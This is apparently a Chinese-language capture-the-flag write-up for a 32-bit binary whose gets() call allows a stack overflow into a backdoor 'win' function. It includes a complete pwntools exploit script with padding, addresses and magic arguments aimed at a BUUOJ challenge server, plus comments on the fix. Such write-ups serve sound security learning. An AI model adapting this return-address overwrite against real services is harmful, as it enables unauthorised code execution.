# 1. 查看程序
32 位程序,开启了 NX
IDA32 查看
main:
vuln:
后门 win:
# 2. 漏洞分析
gets 函数不限制读入长度，可以造成任意长度的栈溢出；程序中还有一个后门函数 win，把返回地址覆盖到 win 并传入满足其判断条件的参数即可。
# 3. exp
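from pwn import *
from LibcSearcher import *

# Exploit script for the challenge described above: a 32-bit binary
# (the writeup lists only NX as enabled) that reads user input with gets()
# into a stack buffer and ships a "backdoor" function `win`.  Because gets()
# has no length bound, the read runs past the buffer, over the saved frame
# pointer and into the saved return address, which is redirected to `win`
# together with the arguments its check expects.
#
# Root cause / fix on the program side: replace gets() with a bounded read
# (fgets()/read() with the buffer size), and build with stack protector and
# PIE so a fixed `win` address cannot be reused this way.

context(os='linux', arch='i386', log_level='debug')

# Challenge instance (values as given in the writeup).
HOST = 'node4.buuoj.cn'
PORT = 26066

# Fixed (non-PIE) addresses read from the disassembly in the writeup.
win = 0x80485CB    # backdoor function
main = 0x804866D   # used as win's return address so the process keeps running

p = remote(HOST, PORT)

# Wait for the prompt printed before the gets() call.  pwntools tube I/O
# works on bytes under Python 3, so the marker is a bytes literal.
p.recvuntil(b"string: \n")

# Frame layout assumed by the writeup: 0x6c bytes of buffer plus 4 bytes of
# saved ebp before the saved return address -- TODO confirm against the
# vuln() frame in IDA.  After the return address comes win's own return
# address, then its two positional arguments in i386 cdecl order
# (arg1 = 0xDEADBEEF, arg2 = 0xDEADC0DE), which the writeup says must match
# win's check.
padding = b"a" * (0x6c + 4)
payload1 = padding + p32(win) + p32(main) + p32(0xDEADBEEF) + p32(0xDEADC0DE)

p.sendline(payload1)
p.interactive()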